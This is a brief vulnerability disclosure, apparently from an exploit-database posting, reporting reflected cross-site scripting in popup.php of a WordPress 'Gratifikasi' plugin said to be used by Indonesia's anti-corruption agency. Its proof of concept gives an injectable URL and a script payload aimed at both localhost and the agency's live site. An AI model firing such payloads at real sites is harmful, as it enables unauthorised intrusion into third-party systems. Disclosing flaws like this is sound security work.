[+] Title: WordPress Gratifikasi Plugin Cross Site Scripting (XSS)
[+] Version: 1.3
[+] Author: abaykandotcom
[+] Tested on: MacOSX
[+] Vulnerable File: popup.php
Description
------------------------------------------
This plugin is used/developed by (i'm not sure yet) Indonesia's Corruption Eradication Commission (Indonesian: Komisi Pemberantasan Korupsi), abbreviated as KPK, is a government agency established to fight corruption.
Proof of Concept
------------------------------------------
The vulnerability can be exploited by using the following url:
http://127.0.0.1/wp-content/themes/gratifikasi/popup.php?page=[XSS]
https://kpk.go.id/gratifikasi/wp-content/themes/gratifikasi/popup.php?page=<script>alert('XSS by abaykandotcom');</script>
Best regards,
Abay.